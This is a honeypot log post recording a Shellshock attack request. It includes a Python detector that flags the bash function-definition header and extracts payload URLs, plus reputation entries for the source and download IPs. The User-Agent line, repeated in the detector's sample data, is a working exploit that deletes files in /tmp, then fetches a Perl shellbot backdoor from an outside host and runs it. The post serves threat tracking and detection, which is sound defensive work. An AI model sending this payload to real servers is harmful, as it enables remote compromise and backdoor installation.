Tuesday, 6 October 2015

62.210.157.90 - shellbot via 23.229.121.186

BEGIN OF HTTP DATA:
2015-10-07 05:42:05
Source IP: 62.210.157.90
Country: FR RiskScore: 1 Malware: []
GET /hello HTTP/1.0
Host: 109.234.106.8
User-Agent: () { :;}; /bin/bash -c "cd /tmp ; rm -rf j* ; wget http://23.229.121.186/paf ; lwp-download http://23.229.121.186/paf ; curl -O /tmp/paf http://23.229.121.186/paf ; perl paf ; perl /tmp/paf ; rm -rf *ju;rm -rf jur*"
When I try to download the malware, ZoneAlarm reports a Backdoor.Perl.Shellbot.s.
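The request above carries the classic Shellshock marker (bash CVE-2014-6271: a function definition `() { :;};` placed in a header value that a CGI handler exports as an environment variable) followed by a download-and-run chain. The following Python is an added example, not part of the original post or of the honeypot that produced the log: it parses raw HTTP request text, flags any header whose value starts with a `() {` function definition, and pulls the URLs out of the payload so they can be fed to a blocklist. The sample input is constructed here from the captured request plus one benign request; all function names are the example's own.

```python
import re

# Constructed sample input: the honeypot request from the post plus a benign
# request, as raw HTTP header text so the example runs offline.
SAMPLE_REQUESTS = [
    'GET /hello HTTP/1.0\r\n'
    'Host: 109.234.106.8\r\n'
    'User-Agent: () { :;}; /bin/bash -c "cd /tmp ; rm -rf j* ; '
    'wget http://23.229.121.186/paf ; lwp-download http://23.229.121.186/paf ; '
    'curl -O /tmp/paf http://23.229.121.186/paf ; perl paf ; perl /tmp/paf ; '
    'rm -rf *ju;rm -rf jur*"\r\n\r\n',
    'GET /index.html HTTP/1.1\r\n'
    'Host: example.test\r\n'
    'User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n',
]

# Shellshock marker: an exported bash function definition "() {" at the start
# of a header value. Whitespace between the tokens is tolerated because
# variants of the payload pad it.
SHELLSHOCK_RE = re.compile(r'^\s*\(\s*\)\s*\{')
# Crude URL extractor for the download chain inside the payload.
URL_RE = re.compile(r'https?://[^\s"\';]+')


def parse_headers(raw):
    """Split a raw HTTP request into (request_line, {lowercased header: value})."""
    head = raw.replace('\r\n', '\n').split('\n\n', 1)[0]
    lines = head.split('\n')
    request_line = lines[0]
    headers = {}
    for line in lines[1:]:
        if ':' not in line:
            continue
        name, value = line.split(':', 1)
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def inspect_request(raw):
    """Return a finding dict for the first header carrying a Shellshock-style
    payload, or None if the request looks clean."""
    request_line, headers = parse_headers(raw)
    for name, value in headers.items():
        if SHELLSHOCK_RE.match(value):
            return {
                'request': request_line,
                'header': name,
                'urls': sorted(set(URL_RE.findall(value))),
            }
    return None


def scan(requests):
    """Run inspect_request over a batch and keep only the hits."""
    return [f for f in (inspect_request(r) for r in requests) if f]


if __name__ == '__main__':
    for finding in scan(SAMPLE_REQUESTS):
        print(finding['request'], '| header:', finding['header'],
              '| download URLs:', ', '.join(finding['urls']))
```

Matching only at the start of the value keeps the false-positive rate low: a legitimate User-Agent or Referer never begins with `() {`. The extracted URLs (here the single `http://23.229.121.186/paf`) are the indicator worth blocking at the egress proxy, since the payload tries three different fetch tools against the same host.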

62.210.157[.]90

    Static Source: GeoIP data
  • Country: France
  • ASN: AS12876 ONLINE S.A.S.
    Dynamic Source: SANS Internet Storm Center
  • Comment: IP is listed on SANS ISC
  • Comment: This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/62.210.157.90
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

23.229.121[.]186

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS36352 ColoCrossing
    Dynamic Source: SANS Internet Storm Center
  • Comment: IP is listed on SANS ISC
  • Comment: This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/23.229.121.186